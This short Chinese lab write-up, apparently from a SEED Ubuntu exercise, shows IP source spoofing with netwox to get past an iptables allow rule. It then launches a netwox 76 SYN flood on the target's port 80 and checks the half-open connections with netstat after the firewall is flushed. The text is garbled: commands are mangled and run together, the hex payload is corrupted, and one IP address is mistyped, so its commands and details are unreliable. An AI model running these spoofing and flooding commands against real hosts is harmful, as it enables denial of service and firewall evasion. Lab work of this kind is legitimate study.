前言靶机: seedubuntu 12.01,IP:192.168.199.134攻击机: Kali-2020.4,IP:192.168.199.129工具:网络IP地址伪装靶机为tcpp
sudo tcpdump-I eth0TCP port 80-n-nn是构成防火墙、伪造许可证的规则,222是我们伪造的ip
sudo iptables-a input-ieth0- s 192.168.199.222/32-jacceptsudoiptables-a input-ieth0- pall-j drop在Kali上使用网络
netwo x52-e ' 033601336023360336033603360433605 '-I ' 192.168.199.222 '-e ' 0033602933606 f 33606 a 33600 D5 '
dos攻击syn flood是建立在IP源地址欺诈的基础上的攻击
netwox 76 -i 19.168.199.134 -p 80此时目标机的80个端口将接收大量不同源的syn分组
使用netstat检查连接情况,但由于防火墙的作用,攻击未成功
netstat -antu | grep :80
接着关闭了防火墙,攻击成功了。 此时,存在大量的syn半连接
iptables-f iptables-x netstat-Antu|grep :80
结束了